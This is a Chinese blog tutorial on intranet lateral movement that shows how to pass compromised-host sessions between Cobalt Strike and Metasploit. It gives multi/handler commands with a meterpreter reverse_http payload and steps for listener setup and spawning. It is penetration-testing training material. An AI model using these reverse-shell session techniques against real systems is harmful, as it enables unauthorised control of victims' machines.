72内网安全-域横向CS&MSF联动及应急响应知识

发布时间:2024年01月01日

拿到才行,拿不到就是多余的

案例一MSF&CobaltStrike 联动 Shell?

有一些功能可能cs或者msf强大一些,他们两个可以相互调用,在真实情况下也是可以cs和msf同时启动的,

cs移交给msf

.创建Foreign监听器

“Listeners”“Add”,“Name”填“msf”(可随便填),“Payload”选“Foreign HTTP”,“HTTP Host(Stager)”填msf的IP地址,“HTTP Port(Stager)”端口自己设定?

协议不够的时候可以添加插件,

2.MSF监听模块设置对应地址端口

选择监听模块

????use exploit/multi/handler

设置payload,注意与CS保持一致

????set payload windows/meterpreter/reverse_http

设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致

????set lhost 0.0.0.0

????set lport 6677

检查设置

????show options

执行

????exploit?

3.CS执行Spawn选择监听器

选择需要反弹shell的电脑,右键“Spawn”,选择刚才生成的监听器

稍等可在MSF上看见反弹结果,如果没有请检查网络?

然后选择自己想反弹的主机的shell。

会话就弹出来了

msf移交给cs

CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线

我们的目的就是反弹到cs刚刚生成的监听器,我们要返回s4,就是那个5566端口的

进入相关模块,设置对应的东西,ip,端口,s4等等

ip设置为刚刚cs的ip监听的端口就可以了,运行,cs等待上线

就完成了上线

ping

an

文章来源:https://blog.csdn.net/san3144393495/article/details/135327872
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。